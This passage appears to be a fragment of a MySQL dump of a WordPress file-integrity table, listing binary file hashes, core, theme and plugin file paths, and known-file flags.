��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('Z/q���$b�a��V','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_progress-bars.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�/��L�ִ�#��#','���Ծ$z2t�`jE\r�D�T���+s�㲠�x','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('z�7����T�0LW�','wp-content/plugins/spam-captcha/core/img/progressbar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D��	N[[����','dL���O�}	&�#�]�_����,/��X��Kp�','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('�����ࣺE\0�堌','wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('�\"��.}}X��1�\Z�','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���+�6�e�A�','�����K�j�ij�q�2�i���c^%ܓK�O?','',0,'?'),('��N�\0��{�A0�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/options.php',0,'\nJ�W�����Y�R�','\nJ�W�����Y�R�','���� \n-��\rZ?�0���!��\ZI�ꨝ�','',0,'?'),('���ˌ��`7��4','wp-content/plugins/unyson/framework/static/libs/unycon/demo.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u!��@`|��Z)b','�օ� ��xT�w��)��G�\0_y��\n:�l�','',0,'?'),('�f�\'מ�s��mk','wp-content/plugins/all-in-one-wp-migration/all-in-one-wp-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{���\0	�:��{N','@E�����O�2V��_�����x���U','',0,'?'),('�vg�y��gi�����','wp-content/themes/illdy/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��;�F!�=��È�','�� ��__��k<���\Z�>Ɠ�� ��|Q��','',0,'?'),('�+�Hi�1	��iV�Y','wp-content/themes/panoramic/library/css/header-standard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��07��_}�BSW�!','���{Oډjń����q��L���v�~�M�','',0,'?'),('� ����K i�D��t','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zz�#H��','n]��x�������\Z_Ѫk�B�-a�&�̃','',0,'?'),('�&��mm%Yӈ2��d�','wp-content/themes/verbosa/content/content-notfound.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Ӓ�uAP�.9.f�D','���*�Bv���1�y��3\'�:�5�Ug�:��','',0,'?'),('�����~��}��n','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/events-list.html',0,'NJ�x�����ǖ��?�','NJ�x�����ǖ��?�','�	g�j|G��C)D\r��c���LƟ���ަ��','',0,'?'),('Ӝ�H�|�ű}��@F�','wp-content/themes/travelify/languages/pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f{\r��=p+��<','�����VK��d�ĠjýU߭vG=�Եn�','',0,'?'),('�!��O3�O^K6D','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryParallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}-x���J���c�','�T��m�Ŝ��{!�i˚�޵���7�c��','',0,'?'),('����7�&��Ȁ','wp-includes/js/tinymce/skins/lightgray/content.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('��*(��*�+�Wj�cp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3Կ:�V�	��U\'','���|<���P*tg�3�dYs��/������','',0,'?'),('�DWhL]�h�s�1��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/static.php',0,'f?��]1`ɠğ���?','f?��]1`ɠğ���?','N^BҶI�=��E$QI�_O-W7eP+U�iP��','',0,'?'),('�Xtݹ�\\uX/zi;\r','wp-content/themes/fabulous-fluid/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɍ! ���^�mʽϧ','�q���J(���^���L�i\0:����:밅','',0,'?'),('��6!�P�bF�:\\�','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-full-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��2`ъ̆W�8l/�-','Ă� ݫj�HiN4�t����-Gi���̸I���','',0,'?'),('�85\\R��qo�-���=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����$x /�����','�<b��ob����nA���E���7_��GK','',0,'?'),('��m�T���{%:','wp-content/themes/mh-magazine-lite/homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(M��q��^Dk��n','+�1N�|����(�X��+#)@􂈋MH,Ÿd�','',0,'?'),('�b�n���N��r��','wp-content/themes/tortuga/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9BQ������͠\r��','٪:rp�\'&��4���WX�A���c]����{','',0,'?'),('��\Z������:','wp-content/themes/fabulous-fluid/js/metabox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������,֡.�x�C�','�X��^J�H.��WHI,K]2�!d��S�ϐ','',0,'?'),('��0r�H\"�YK]T�','wp-admin/css/site-icon-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����L�DR��*�','Yin>j�#�K�N%8TP����O_���,','',0,'?'),('=$l�.��~���A:','wp-admin/images/freedoms.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e\r�$�]�O{��','�� \n��9�)Kb}�S�p���McP�AYX','',0,'?'),('	ͩ�d��k�5��R','wp-content/themes/supernews/acmethemes/customizer/design-options/blog-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@rW�>Άj�t���','�+�0�Д�F�e�3��!I�)�MJ����:�','',0,'?'),('7� -b5�؋\"�%�','wp-content/themes/hueman/assets/front/img/demo/3-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}0(�I������','�Yng�$���� g�;K:���G����`�','',0,'?'),('#�\'t��g��O�\n�{','wp-content/plugins/universal-google-analytics/index.php',0,'���-�c�+,��','���-�c�+,��','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('(���љ����\0H<_','wp-admin/includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','س�F\0��~���Y�','��\\^��\Z���߹�b*j��R	��p<#~%7','',0,'?'),('9�:�H�z\Z�͓]ph','wp-content/themes/clean-magazine/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����mW7F����hZ�','�`5�G��+��dY��qU洅C�\"W�K','',0,'?'),('<.��4�v��c�\"`�t','wp-includes/class-wp-simplepie-sanitize-kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('h:ڍ�����H��','wp-content/themes/alpha-store/img/site-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nb�R�i�l�0��r�','�\Z���ti��nv}�\'W�4^��+�c(Ѕ}�W�','',0,'?'),('i�PÙ��ld\0��','wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#|�\"�Hr`r=>�','&\\j�n��\'�@ν��❀���,��)\"��','',0,'?'),('k�4c����5<\"','wp-includes/js/dist/autop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1{Y�z�(��no2','���SOP\r�n�8U�L��\0�u ��x���	','',0,'?'),('q�\0q�r�b��','wp-content/themes/accelerate/content-blog-large-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q(T��B��\r\Z��','����>(�Fe�����!G��.¬%m��u��M\"','',0,'?'),('w}/��:_�ʜe\\y��','wp-content/themes/wen-business/third-party/font-awesome/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��\n�\rcϸ�?�9','�j%-�����!�ԟ���wf�T-&�}?�','',0,'?'),('��*��R��nS�O@�','wp-content/themes/illdy/layout/js/widget-upload-image/widget-upload-image.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+���W����','��.7�<B�!�l�ͣm1�_Nz��8�`ԏ�c�','',0,'?'),('��>I���t�)w�� ','wp-content/plugins/universal-google-analytics/universal-google-analytics.php',0,'�[h�j<,�P\ZQ6��','�[h�j<,�P\ZQ6��','��Bs�S�O\'Fb�4��\r\'��qnq_Ի�f','',0,'?'),('���U��2E�Đ!U��','wp-content/themes/clean-magazine/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WO(�8�Z�\0)��Q���','�\r3��`�hh��\nR�J�r��q��X�¿���','',0,'?'),('�GY\0��Գ,�\'','wp-content/themes/panoramic/library/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��r��N\'\n��2�-k�','?uW=��uGk�^x��F��\r�dC��ܚȯ�','',0,'?'),('���ե�QXj���','wp-content/themes/travelify/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�aaa\n�,�kz.','��D�#�\rH��g�7��\\	e�k[��8�/�','',0,'?'),('�BQ����X�я\r','wp-content/themes/hueman/assets/admin/img/footer-widgets-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_O�k\"i���\nh�','6�Ϋ;τ92k�-�q��F\\Y����;�Ҟ','',0,'?'),('��pCy�)�	�{�','wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r	������_���','��H�� (��X���J�N5�\\<*m�\0\r�4��','',0,'?'),('�wcA~�U�)aZ�p','wp-content/themes/clean-magazine/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�3�d�I=.`0A�Mq','�9QkzՄI��/W��\0.?��~Y�T7���','',0,'?'),('�CrE���E��`','wp-content/themes/nirvana/images/patterns/pattern2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J��zn`�?','�\ZEA�T���\0s��O\0�$ʕH�y��%Z ','',0,'?'),('�>]�I_�V��','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/img/logo-20x20.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�{HX��=��~Nj','6\'�������VVnT6`YT�yf�\rĂC���','',0,'?'),('���).��p�\ZI&','wp-content/themes/vega/parts/frontpage-open1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r/�vEO���̚��#�',')D\'P�/6!�B��:�/���N�lV�U��','',0,'?'),('�6K@ջ\'��ƈǜ\'�','wp-content/themes/illdy/inc/admin/welcome-screen/css/welcome_customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\'��F\'6=�\\$��','� J��⽸$��}\r�\'���,Pw)�Lt�.v�\r','',0,'?'),('��9���䷳\n���6�','wp-content/plugins/wordpress-seo/admin/pages/tools.php',0,'l�7=�fY���S�','l�7=�fY���S�','=��Y����\nu���3?a>w�moe �}C�k�','',0,'?'),('�g}6ĵ�9<WD%�','wp-content/themes/hueman/assets/front/img/pre.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�X����<�.�(�(��','�����IVZ3M�?׋���%&��9�V�9�����','',0,'?'),('��)v.��n�]�L�','wp-content/themes/skt-construction-lite/css/style_base.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*/���ۑ�AYj�j',']�7�VѰA��)]=�h9\'�c\'�<�4� ��|','',0,'?'),('�L.r�$\'��i��/3�','wp-content/themes/hueman/assets/czr/css/czr-control.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��9��ƻ�c�M�7','���EA?&����	�MMP��1����x�C','',0,'?'),(';h��!��Ca���','wp-content/themes/travelify/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5/�.6�}Xz�!J�','J����VJ��;�\'�\r�W����y��i','',0,'?'),('!���@|�4��n���','wp-includes/class-http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�	�.W�WO}0�fc','n_�qhi }͏��ы���\";yw���\Z�am�','',0,'?'),('\'ڞ\0;��?�+VҪ�','wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=��#L�H���','q�/*߲3��x�S���~�.\']w��k�,W','',0,'?'),('1��oZ��]�u3�b','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.corporatedomains.php',0,'>l�`Xk�@|��j�','>l�`Xk�@|��j�','��.[0�.�l���!V��:�jWSL�\ZV�%�','',0,'?'),(';pR9��+�qpծ','wp-admin/includes/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T>n?\0-����H�$C�n','цe@�g̒���%kO\Z?�x�,\rg�eˈ','',0,'?'),('<~�8���I�&è','wp-content/themes/fabulous-fluid/languages/fabulous-fluid.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#o�F�/A+���ĥ','�Q�s��4��M�H���c�qu�ȟ����','',0,'?'),('=�rn$h�{','wp-content/themes/panoramic/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�sk�g\\�} ��%�',';�m�������\r3��o\\ODM4���|�|��','',0,'?'),('?�7��>�����{��','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ms.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�6C����U*�R��','��M�[�@K���7�iR��3.>�ڝ@[_�,�','',0,'?'),('@|ܜ�n�4~���V�','wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ʠŶO@�W���','�3̏��#�d�z�&떿0̤&���.y�','',0,'?'),('B�{�)�s��\'','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php',0,'qdk�#��6ѝ:O���','qdk�#��6ѝ:O���','�[�{��*��9�ˊy@�j���^B;yM�','',0,'?'),('J_�a�)�]i!9�\\','wp-content/plugins/wp-date-remover/includes/class-wp-date-remover-activator.php',0,'\01�����7\'1�Ea>�d','\01�����7\'1�Ea>�d','4�V��&��e�܂;s��\0.�l?�ɺZ	�','',0,'?'),('\\Z���#�w`�\0�','wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-featured-grid-content-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8[d��j�\"l��','�V.�널�h�&�$�_u\0z�J]DΕ	F��o��','',0,'?'),('\\�>y���7�E=`�a','wp-content/themes/hueman/assets/front/img/demo/9-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǵ.����jӀ�Z\"G.','8\"��q_��	����p��.�۞+x���','',0,'?'),('f�T›ĀΘ�I�Ƨq','wp-content/themes/panoramic/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/	2~�ߩ�j|�','f��S�\0f^�P����z��N�jP�I}a0','',0,'?'),('l�<���DSQ�(.','wp-content/themes/travelify/languages/nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x���.�/�\'����','�ߜ���?�6Ax�5��֕KB��P(@�	�','',0,'?'),('m�1&�%����','wp-content/themes/square/css/images/AjaxLoader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��R���.\\E��{','� 4\\{b��w��$���\"E�}��Vk7�Ro\0','',0,'?'),('nq��6k���%\"�5','wp-content/plugins/unyson/framework/includes/option-types/switch/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������U�A���','6���pY3v�oͲ��ު�c,_|\'�`���','',0,'?'),('x��m���\0�~���','wp-includes/customize/class-wp-customize-nav-menus-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('�\rO�xnNqO|���','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/extensions-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w���|b���7�%','Ȋ}������|\"��%P��P�!O��\n�Jt','',0,'?'),('�l�g<���=�l�','wp-content/plugins/akismet/class.akismet-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1O��2e1����rJ�j','#T�c��x�E��ƒy�ũ��H���>��','',0,'?'),('�؎ՖoY�?��a�E','wp-content/themes/panoramic/library/css/woocommerce-custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gNƥV���0�f','���C �z_��F\Z��6�:7��}d���P��','',0,'?'),('���\n�#�T��?׻��','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.�ZK7�Rb~<��','L��ؖ�kn��HN�\n��$�����ʨ�#���','',0,'?'),('����\"@O�wQ_ܨ2M','wp-content/plugins/contact-form-7/includes/contact-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�D>]8��^s��ڛg','�K���3�)�l0�B�{��s�	$�N&G','',0,'?'),('�1� �����&�','wp-content/themes/precious-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&����MF�#\0T','��e59M�)����c�|S�\\ׁ��m����','',0,'?'),('�V�9��<�*\r�̬D','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ar.js',0,'#��à hE*�N}8P�','#��à hE*�N}8P�','yQ�Y�	<�W\0������y�]�!2','',0,'?'),('�Ú2��d�=','wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���98~��@C','p�f|��o.��v��2V�6�Q����Uϼ�=��','',0,'?'),('�P\0\'�0l���v�#J<','wp-includes/js/jquery/ui/effect-fold.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&��L���R���<','��C�]*\'�W�\"�о����V��Jq���','',0,'?'),('��Yw\0�R�|\"���','wp-content/themes/morfeu/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�O ���T���5���','PH-�:&���z�v�b�J?�$R=���3�','',0,'?'),('���H���M0�cYz','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/scripts.js',0,'[_���=\'����G�','[_���=\'����G�','A`X<߰DA����\ZT��e�\0˵M�ZE��Jה','',0,'?'),('»7b*	�Anա|r�','wp-content/themes/accelerate/inc/admin/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\0&��r��X�&','�t����0[v#�la��jё{�a�CMR��T}�','',0,'?'),('Ȅ���xy����','wp-includes/js/tinymce/skins/wordpress/images/embedded.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p�N��y~�n\"','�{��u�x�\'����J�º@i\"H;�]6h','',0,'?'),('ϴ 3P`#8^��Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�\r���Q�<p��Ny','1\r������Y��c�~pz�\r\rtJ�','',0,'?'),('�G�#�;\"L�%���','wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��qu�jY����>','%.V��Gd^ yT����=s�<׾m#S�V�','',0,'?'),('�EW|��^2r�W','wp-content/themes/illdy/layout/images/blog/blog-1.jpeg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<�`^�(�T��','≰y�#-?ϲjgKI�Ϻ\n���2zs��X','',0,'?'),('���S��n����','wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),('��DCת5rp8<8?','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/config.php',0,'s��(��7�}���ŲK','s��(��7�}���ŲK','J4,-ې��sm��/�\r��t@:B� �h�̪','',0,'?'),('�aˣ�I�$���)Qa','wp-content/plugins/unyson/framework/static/libs/uri/URI.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�͞�;��{N�_�Ŗ�','ax���;���D���{��q$d�}\'Y','',0,'?'),('��?^YΒ��1� ','wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6tbĻ0��N�� M�','�i�cLE����K6&+B��b�!T�=�`��1>','',0,'?'),('~.�]��ժr�b','wp-content/themes/hueman/languages/cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�殺����A7����~','�j!�u��GQ�M�y��������a�L�-P�','',0,'?'),('�*g1<�QtP�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_table-row.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��r��(��s�.�)','{h��4��_��5�7�{$N{줫�.d����','',0,'?'),('\"��N߬jj)��\0��N','wp-admin/images/menu-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jG����{�>�^;$��','�2]y��#h���2�9�> ^s�\rH�	\n��g��','',0,'?'),('1����}!M�tqF��','wp-content/themes/hueman/option-tree/assets/fonts/option-tree-font.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���FN����#�!��','�P,�O%�\0�\'&�I��z.��������M�','',0,'?'),('q���_\"�1�F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('tZQ��Yz0����跫','wp-admin/images/wordpress-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ư�y��o�8��8S�`�','bx�L�PͰ��=^���a�m���1i��','',0,'?'),('���!��Sqq�\Z,','wp-content/themes/illdy/layout/fonts/glyphicons/glyphicons-halflings-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ዿa*.C��q�/N','�Iٖ��KJ\"�t�ϭ^�b_[#f�K�:O)g','',0,'?'),('����ؒ�$���r�r','wp-content/themes/mh-magazine-lite/languages/uk_UA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7���������ǯ�','��h�c$�~4:�m	���2��!�;\\t�~o','',0,'?'),('���t]o���','wp-content/plugins/spam-captcha/lang/spam_captcha-fi_FI.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����d��3����U\'','�AE����0��\"<!ߢґ�s�yNv���4�','',0,'?'),('���k�5S�H���Ы','wp-includes/SimplePie/Author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��hK\0�k�1���N\"','N����\\��pt3����+,l�\'�cOQ+�Z�','',0,'?'),('���e�bW�A0�d','wp-admin/images/comment-grey-bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�*\'����t���F','7	��y�񮌬��U{����ԟ��`��]m��','',0,'?'),('��;<��Ӗ_�e��','wp-content/themes/wen-business/inc/hook/custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��y��m�Xh�dr','X���T���\'��!�S�D�!jn�N�1','',0,'?'),('��T\Z��c�!�','wp-content/themes/sg-window/publication/fonts/genericons/Genericons.svg',0,'/�=³zeX*�|��b','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�۝c�1��ח�d��','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�#͇1��3��mϸ','䛾zy{�v\n\r�\0-W-��j\"|C u�h�^�','',0,'?'),('���d�l�ӲJ����','wp-content/themes/square/js/draggabilly.pkgd.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��}�S�?��','\0َ$�O���?2f��62���YX^>��0�','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',0,'U��\0����A��','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('�Su���2(U��ݬki','wp-content/themes/relia/inc/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4\"��΄�`�Př�','��\r1&�_���՞�0�.���~~/-8�\"�','',0,'?'),('�Ju���Hp������','wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:,�\'��:l�e����','h�B	Z����tUxW(b�\"�S���+��6\0X@�','',0,'?'),('�˚���@9/דjME','wp-content/themes/verbosa/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��I o}���S�\r',',+�f��4�r�,?ً��L9L�lcǡ��p','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('�!\0Jg�(|�5*�]','wp-content/themes/verbosa/content/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��󲢜�sw6��`�\0','ڷ���@<.��	[%����f��C�|��*xd�9','',0,'?'),('��u��J�8#��?','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/piecemeal/server/index.php',0,'�x��5�/Q,X�~�','�x��5�/Q,X�~�','o��ڟQD���<�Y7$�F!{��ՙ�4���','',0,'?'),('��Ͱ����z\'�!','wp-content/themes/sg-window/page-templates/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�K���\"�����','������0�c�:&ikA�`��3��^ep,�s','',0,'?'),('��4�@mDSgx\rb�','wp-content/themes/verbosa/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��;v%�ȼ�`��','�>�q���؊H+�^�%ƌ�]�0�T�i�o ���','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),('ӟYb@�YAcл#�','wp-content/themes/hueman/functions/init-meta-boxes.php',0,'�1�p�\"&�ǫgտ��','�1�p�\"&�ǫgտ��','�wg;\n1��Ҙ�:�>�,\"���X\Z��%��\\zs','',0,'?'),('���i,.m�d2�\ZW','wp-content/themes/illdy/sections/front-page-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nn��mk$gE�CD','vޫ>��X�`Ü���[�9��CQjc*�7�','',0,'?'),('\Zpe������5\'�<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�`q�D@��9�~','1�*z�+z���6���(�c�Vϙ���{Vշ','',0,'?'),('��~�`55�t&fn','wp-content/themes/nirvana/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�\r�cB996X','ݔ`����cqq��]&���#��^�\'\n�','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0V���